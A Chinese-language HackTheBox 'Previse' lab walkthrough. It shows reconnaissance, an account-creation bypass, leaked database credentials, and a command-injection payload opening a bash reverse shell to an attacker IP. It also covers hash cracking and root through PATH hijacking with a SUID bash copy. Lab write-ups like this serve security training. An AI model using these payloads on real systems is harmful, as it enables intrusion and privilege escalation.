HackTheBox | Previse

Previse

nmap扫描,开放22、80.

image-20220807154018664

访问80,是一个登录页面

image-20220807154103013

dirsearch扫扫,属于是啥也没扫出来

image-20220807154743379

wp里扫出个nav.php

image-20220807154822258

点击这几个链接,发现都跳转到了login.php。

使用bp抓包,不会自动跳转;看到了accounts.php的内容

image-20220807155117293

根据幻想出来的表单,提交POST请求,创建新用户

image-20220807155527109

使用创建的用户成功登录

image-20220807155603502

找到一个SITEBACKUP.ZIP

image-20220807155643387

下载之后在config.php中找到了一对账号root\mySQL_p@ssw0rd!:)

image-20220807155813248

logs.php中发现exec函数,该函数将接收delim传来的参数,并执行

image-20220807160538431

对应页面为

image-20220807160623170

bp抓包,修改delim的值

;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1234 0>&1';

url编码后发包

image-20220807160958169

拿到反弹shell

image-20220807161020495

检查/etc/passwd文件,存在用户m4lwhere

image-20220807161104514

查找数据库中的内容,得到m4lwhere的hash后的密码$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.,其中包含一个salt值

image-20220807161545020

login.php中找到相关的代码,根据代码可知使用$1$🧂llol$作为salt加密了密码,得到了数据库中的字符串

image-20220807161935419

使用john跑一下密码

image-20220807171331675

ssh登录

image-20220807170032309

sudo -l检查,可以执行/opt/scripts/access_backup.sh

image-20220807170300379

不出意料,不具备写权限

image-20220807170338556

检查文件内容,发现是在对访问日志做备份

image-20220807171540265

提权方法直接看了wp,理解了一下,不是很难,大概就是对环境变量的劫持

在Linux中执行命令时,会按照$PATH的顺序挨个去每个文件夹下查找是否存在名称符合的可执行程序,可以使用echo $PATH查看

image-20220807172416426

以上述执行结果为例,如果在/usr/local/sbin/usr/local/bin下都存在一个bash可执行文件,那么就会先使用/usr/local/sbin/bash;如果/usr/local/sbin中不存在bash,则会继续向后寻找,直至在某一个文件夹中找到一个叫做bash的文件。

在这题中,使用如下命令将/tmp目录作为新增加的环境变量目录

export PATH=/tmp:$PATH

image-20220807172751348

然后在/tmp目录下创建了一个gzip文件,文件中写入

#!/bin/bash
cp /bin/bash /tmp/bash
chmod 4755 /tmp/bash

这里又使用到了4755这个特殊权限,将/tmp/bash的SUID置位,那么在运行/tmp/bash的时候,它就会以该文件的所有者的权限运行。

需要注意的是,要将新创建的gzip文件添加可执行权限

chmod +x gzip

然后使用sudo执行脚本,执行完成后会发现在/tmp目录下多了一个bash文件

image-20220807173211394

执行bash -p,可以看到当前用户还是m4lwhere,但是euid已变成0,也就是当前进程拥有root用户的权限,从而完成提权

image-20220807173245668

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值